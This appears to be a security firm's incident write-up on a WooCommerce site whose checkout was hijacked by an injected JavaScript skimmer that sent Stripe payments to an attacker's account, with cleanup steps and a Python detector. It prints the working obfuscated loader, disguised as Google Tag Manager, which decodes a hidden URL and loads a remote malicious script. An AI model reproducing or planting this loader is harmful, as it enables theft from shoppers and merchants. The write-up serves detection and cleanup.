WooCommerce Attack: Diverted Payments to Unauthorized Stripe Account through JS skimmer

Recently, we investigated a case where a customer completed a payment using a WooCommerce checkout link created directly by the site owner. The client’s credit card was successfully charged, confirming that the transaction went through. However, the order never appeared in the WooCommerce dashboard and there was no corresponding record in the merchant’s legitimate Stripe account.

Magefix Security: malware cleanup & protection


Further investigation revealed another alarming detail: the client’s bank reported that the charge appeared to originate from a foreign location unrelated to the business. In other words, the payment was processed somewhere, but not by the intended Stripe merchant account.

In this guide we will explain how this type of WooCommerce payment interception attack works, the warning signs that indicate your checkout may have been compromised, and the steps required to investigate and secure an affected website.

Steps taken to address the infection:

  • Created a full backup of the database and website files.
  • Identified and removed the malicious JavaScript injected into the website and loaded from an external domain (the malicious snippet was stored in the “ihaf_insert_footer” option).
  • Performed a full manual scan of the website files and database to locate and remove backdoors.
  • Analyzed the payment logs and submitted a report to Stripe, including the attacker’s Stripe account and the associated PaymentIntent IDs.
  • Secured the website by applying all necessary updates and carefully inspecting its components.

Attacker Stripe account:
acct_1SfQn2HYEuofo2d9
OLTRADING EOOD
Bulgaria
www.notreadyyet.com
[email protected]

Hosting account (details provided by Cloudflare):
Podaon SIA
[email protected]

Here is an example of an obfuscated JavaScript loader disguised as Google Tag Manager, which dynamically injects an external script from a malicious domain using Base64 decoding (atob).
The code was found in the database during the cleanup process. To locate it, we ran the following SQL command:

SELECT option_name
FROM wp_options
WHERE option_value LIKE '%atob(%';

<!-- Google Tag Manager -->
<script>
!function(e,a,n,t,o,r,c){e.GoogleTagManagerLoaderScript=o;r=a.createElement(t),c=a.getElementsByTagName(t)[0],r.async=1,r.src=e.atob("aHR0cHM6Ly9zdHlsZW1hbnNpc2ZvcmVhbC5jb20vMy9hYnJvYWRlZXovdmVuZG9yLmNodW5rLnJsazlxZy5qcw=="),c.parentNode.insertBefore(r,c)}(window,document,0,"script","always");
</script>
<!-- End Google Tag Manager -->

Malicious JavaScript injected into checkout to divert Stripe payments to an attacker-controlled account.
hxxps://stylemansisforeal[.]com/3/…/vendor.chunk.rlk9qg.js
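The SQL query above only finds rows that mention atob(; it does not tell you where the decoded URL points. The script below is an added example (not part of the original cleanup tooling) that takes rows exported from wp_options, decodes every base64 literal passed to atob(), and flags any decoded script URL whose host is not a Google Tag Manager host. The sample rows, the option names and the hidden URL are constructed placeholders, not the real indicators from this case.

```python
import base64
import re
from urllib.parse import urlparse

# Hosts a genuine Google Tag Manager snippet loads from. Assumption: extend this
# set with any CDN your site legitimately loads scripts from.
ALLOWED_HOSTS = {"www.googletagmanager.com", "googletagmanager.com"}

# Matches a base64 string literal passed to atob(), the trick the loader on
# this page uses to hide the real script URL from a plain-text search.
ATOB_LITERAL = re.compile(r"""atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")


def decoded_atob_urls(js_text):
    """Return every atob() literal in js_text that decodes to a URL."""
    urls = []
    for b64 in ATOB_LITERAL.findall(js_text):
        try:
            text = base64.b64decode(b64, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 or not text, so not a hidden URL
        if text.startswith(("http://", "https://", "//")):
            urls.append(text)
    return urls


def audit_wp_options(rows):
    """rows: iterable of (option_name, option_value) pairs exported from wp_options.
    Returns (option_name, decoded_url, host) for every loader off the allow-list."""
    findings = []
    for name, value in rows:
        for url in decoded_atob_urls(value):
            host = (urlparse(url).hostname or "").lower()
            if host not in ALLOWED_HOSTS:
                findings.append((name, url, host))
    return findings


# Constructed sample rows, not a real dump: one genuine GTM tag and one loader
# that hides its script URL behind atob(), shaped like the snippet in this case.
HIDDEN_URL = "https://cdn-placeholder.invalid/3/vendor.chunk.js"  # placeholder, not a real IoC
SAMPLE_ROWS = [
    ("ihaf_insert_header",
     '<script async src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXX"></script>'),
    ("ihaf_insert_footer",
     '<!-- Google Tag Manager --><script>!function(e,a,t,r,c){r=a.createElement(t),'
     'c=a.getElementsByTagName(t)[0],r.async=1,r.src=e.atob("'
     + base64.b64encode(HIDDEN_URL.encode()).decode()
     + '"),c.parentNode.insertBefore(r,c)}(window,document,"script")</script>'),
]

if __name__ == "__main__":
    for name, url, host in audit_wp_options(SAMPLE_ROWS):
        print(f"[!] {name}: atob() loads {url} (host {host!r} is not allowed)")
```

Feed it the output of `SELECT option_name, option_value FROM wp_options` (or the same columns from a post_content or theme-file scan) and review every finding by hand; a legitimate tag never needs to hide its src behind atob().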
